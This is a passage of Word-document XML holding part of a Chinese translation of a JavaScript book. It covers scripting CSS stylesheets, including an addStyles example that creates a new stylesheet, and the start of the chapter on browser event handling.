      </w:r>
      <w:r>
        <w:t>选择器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ruleText=rule.style.cssText;//</w:t>
      </w:r>
      <w:r>
        <w:t>文本形式的样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果规则应用在</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>元素上，也将其应</w:t>
      </w:r>
      <w:r>
        <w:t>用到</w:t>
      </w:r>
      <w:r>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:t>元素上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意：仅当选择器在字面上为</w:t>
      </w:r>
      <w:r>
        <w:t>"h1"</w:t>
      </w:r>
      <w:r>
        <w:t>时这才起作用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(selector=="h1"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(ss.insertRule)ss.insertRule("h2{"+ruleText+"}",rules.length);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(ss.addRule)ss.addRule("h2",ruleText,rules.length);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果规则设置了</w:t>
      </w:r>
      <w:r>
        <w:t>text-decoration</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则将其删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(rule.style.textDecoration){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(ss.delete</w:t>
      </w:r>
      <w:r>
        <w:t>Rule)ss.deleteRule(i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>else if(ss.removeRule)ss.removeRule(i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i--;//</w:t>
      </w:r>
      <w:r>
        <w:t>调整循环索引，因为以上的规则</w:t>
      </w:r>
      <w:r>
        <w:t>i+1</w:t>
      </w:r>
      <w:r>
        <w:t>现在即为规则</w:t>
      </w:r>
      <w:r>
        <w:t>i</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21" w:name="16_6_3_Chuang_Jian_Xin_Yang_Shi_Biao_"/>
      <w:r>
        <w:t>16.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　创建新样式表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="421"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，创建整个新样式表并将其添加到文档是中可能的。在大多数浏览器中，可以用标准的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>技术：只要创建一个全新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，将其插入到文档的头部，然后用其</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性来设置样式表内容。但是在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>以及更早版本中，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>对象通过非标准方法</w:t>
      </w:r>
      <w:r>
        <w:t>docume</w:t>
      </w:r>
      <w:r>
        <w:t>nt.createStyleSheet()</w:t>
      </w:r>
      <w:r>
        <w:t>来创建，其样式文本用</w:t>
      </w:r>
      <w:r>
        <w:t>cssText</w:t>
      </w:r>
      <w:r>
        <w:t>属性值来指定。示例说明如例</w:t>
      </w:r>
      <w:r>
        <w:t>16-6</w:t>
      </w:r>
      <w:r>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>16-6</w:t>
      </w:r>
      <w:r>
        <w:t>：创建一个新样式表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对文档添加一个样式表，用指定的样式填充它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//styles</w:t>
      </w:r>
      <w:r>
        <w:t>参数可能是字符组或对象。如果它是字符串，就把它作为样式表的文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它是对象，将每个定义样式规则的每个属性添加到样式表中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>属性名即为选择器，其值即为对应的样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function addStyles(styles){//</w:t>
      </w:r>
      <w:r>
        <w:t>首先，创建一个新样式表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var styleElt,styleSheet;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(document.createStyleSheet){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果定义了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，即可使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>styleSheet=document.createStyleSheet();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var head=document.getElementsByTagName("head")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>styleElt=document.createElement("style");//</w:t>
      </w:r>
      <w:r>
        <w:t>新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>head.appendChild(styleElt);//</w:t>
      </w:r>
      <w:r>
        <w:t>把它插入＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在，新的样式表应该</w:t>
      </w:r>
      <w:r>
        <w:t>是最后一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>styleSheet=document.styleSheets[document.styleSheets.length-1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在向其中插入样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof styles==="string"){//</w:t>
      </w:r>
      <w:r>
        <w:t>参数是样式表文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(styleElt)styleElt.innerHTML=styles;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else styleSheet.cssText=styles;//IE API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>参数是待插入的单独的规则的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(selector in </w:t>
      </w:r>
      <w:r>
        <w:t>styles){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(styleSheet.insertRule){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var rule=selector+"{"+styles[selector]+"}";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>styleSheet.insertRule(rule,i++);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>styleSheet.addRule(selector,styles[selector],i++);</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4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>例如，可参照</w:t>
      </w:r>
      <w:r>
        <w:t>Eric Meyer</w:t>
      </w:r>
      <w:r>
        <w:t>的《</w:t>
      </w:r>
      <w:r>
        <w:t>CSS:The Definitive Guide</w:t>
      </w:r>
      <w:r>
        <w:t>》（</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="422" w:name="Di_17Zhang__Shi_Jian_Chu_Li_"/>
      <w:bookmarkStart w:id="423" w:name="Di_17Zhang__Shi_Jian_Chu_Li_____Ke_Hu_Du"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章　事件处理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="422"/>
      <w:bookmarkEnd w:id="423"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序采用了异步事件驱动编程模型（</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节有介绍）。在这种程序设计风格下，当文档、浏览器、元素或与之相关的对象发生某些有趣的事情时，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器就会产生事件（</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>）。例如，当</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器加载完文档、用户把鼠标指针移到超链接上或敲击键盘时，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器都会产生事件。如果</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序关注特定类型的事件，那么它可以注册当这类事件发生时要调用的一个或多个函数。请注意，这种风格并不只应用于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>编程，所有使用图形用户界面的应用程序都采用了它，它们静待某些事情发生（即</w:t>
      </w:r>
      <w:r>
        <w:t>，它们等待事件发生），然后它们响应。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请注意，事件本身并不是一个需要定义的技术名词。简而言之，事件就是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器通知应用程序发生了什么事情。事件不是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象，不会出现在程序源代码中。当然，会有一些事件相关的对象出现在源代码中，它们需要技术说明，因此，本章从一些重要的定义开始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件类型（</w:t>
      </w:r>
      <w:r>
        <w:t>eventtype</w:t>
      </w:r>
      <w:r>
        <w:t>）是一个用来说明发生什么类型事件的字符串。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>"mousemove"</w:t>
      </w:r>
      <w:r>
        <w:t>表示用户移动鼠标，</w:t>
      </w:r>
      <w:r>
        <w:t>"keydown"</w:t>
      </w:r>
      <w:r>
        <w:t>表示键盘上某个键被按下，而</w:t>
      </w:r>
      <w:r>
        <w:t>"load"</w:t>
      </w:r>
      <w:r>
        <w:t>表示文档（或某个其他资源）从网络</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>上加载完毕。</w:t>
      </w:r>
      <w:r>
        <w:t>由于事件类型只是一个字符串，因此实际上有时会称之为事件名字（</w:t>
      </w:r>
      <w:r>
        <w:t>event name</w:t>
      </w:r>
      <w:r>
        <w:t>），我们用这个名字来标识所谈论的特定类型的事件。现代浏览器支持许多事件类型，</w:t>
      </w:r>
      <w:r>
        <w:t>17.1</w:t>
      </w:r>
      <w:r>
        <w:t>节会有一个概述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件目标（</w:t>
      </w:r>
      <w:r>
        <w:t>event target</w:t>
      </w:r>
      <w:r>
        <w:t>）是发生的事件或与之相关的对象。当讲事件时，我们必须同时指明类型和目标。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>上的</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件或＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件。在客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序中，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象是最常见的事件目标，但某些事件是由其他类型的对象触发。例如</w:t>
      </w:r>
      <w:r>
        <w:t>，第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章会介绍由</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象触发的</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件处理程序（</w:t>
      </w:r>
      <w:r>
        <w:t>event handler</w:t>
      </w:r>
      <w:r>
        <w:t>）或事件监听程序（</w:t>
      </w:r>
      <w:r>
        <w:t>event listener</w:t>
      </w:r>
      <w:r>
        <w:t>）是处理或响应事件的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。应用程序通过指明事件类型和事件目标，在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中注册它们的事件处理程序函数。当在特定的目标上发生特定类型的事件时，浏览器会调用对应的处理程序。当对象上注册的事件处理程序被调用时，我们有时会说浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>触发</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>fire</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>trigger</w:t>
      </w:r>
      <w:r>
        <w:t>）和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>派发</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>dispatch</w:t>
      </w:r>
      <w:r>
        <w:t>）了事件。有很多注册事件处理程序的</w:t>
      </w:r>
      <w:r>
        <w:t>方法，</w:t>
      </w:r>
      <w:r>
        <w:t>17.2</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>17.3</w:t>
      </w:r>
      <w:r>
        <w:t>节会详细说明处理程序的注册和调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>事件对象（</w:t>
      </w:r>
      <w:r>
        <w:t>event object</w:t>
      </w:r>
      <w:r>
        <w:t>）是与特定事件相关且包含有关该事件详细信息的对象。事件对象作为参数传递给事件处理程序函数（不包括</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及之前版本，在这些浏览器中有时仅能通过全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>才能得到）。所有的事件对象都有用来指定事件类型的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性和指定事件目标的</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性。（在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及之前版本中用</w:t>
      </w:r>
      <w:r>
        <w:t>srcElement</w:t>
      </w:r>
      <w:r>
        <w:t>而非</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>。）每个事件类型都为其相关事件对象定义一组属性。例如，鼠标事件的相关对象会包含鼠标指针的坐标，而键盘事件</w:t>
      </w:r>
      <w:r>
        <w:t>的相关对象会包含按下的键和辅助键的详细信息。许多事件类型仅定义了像</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>这样少量的标准属性，就无法获取许多其他有用的信息。对于这些事件而言，只是事件简单地发生，无法得到事件的详细信息。本章没有专门的小节来介绍</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而是在介绍特定事件类型时会说明事件对象的属性。在第四部分描述特定事件类型时会解释事件对象的属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件传播（</w:t>
      </w:r>
      <w:r>
        <w:t>event propagation</w:t>
      </w:r>
      <w:r>
        <w:t>）是浏览器决定哪个对象触发其事件处理程序的过程。对于单个对象的特定事件（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件），必须是不能传播</w:t>
      </w:r>
      <w:r>
        <w:t>的。当文档元素上发生某个类型的事件时，然而，它们会在文档树上向上传播或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>冒泡</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>bubble</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果用户移动鼠标指针到超链接上，在定义这个链接的＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上首先会触发</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件，然后是在容器元素上触发这个</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>事件，也许是＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素、＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素或</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身。有时，在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>或其他容器元素上注册单个事件处理程序比在每个独立的目标元素上都注册处理程序要更方便。事件处理程序能通过调用方法或设置事件对象属性来阻止事件传播，这样它就能停止冒泡且将无法在容器元素上触发处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>17.3.</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>节会详细介绍事件传播。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件传播的另外一种形式称为事件捕获（</w:t>
      </w:r>
      <w:r>
        <w:t>event capturing</w:t>
      </w:r>
      <w:r>
        <w:t>），在容器元素上注册的特定处理程序有机会在事件传播到真实目标之前拦截（或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>捕获</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）它。</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>及之前版本不支持事件捕获，所以不常用它。但是，当处理鼠标拖放事件时，捕获或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>夺取</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>鼠标事件的能力是必需的，例</w:t>
      </w:r>
      <w:r>
        <w:t>17-2</w:t>
      </w:r>
      <w:r>
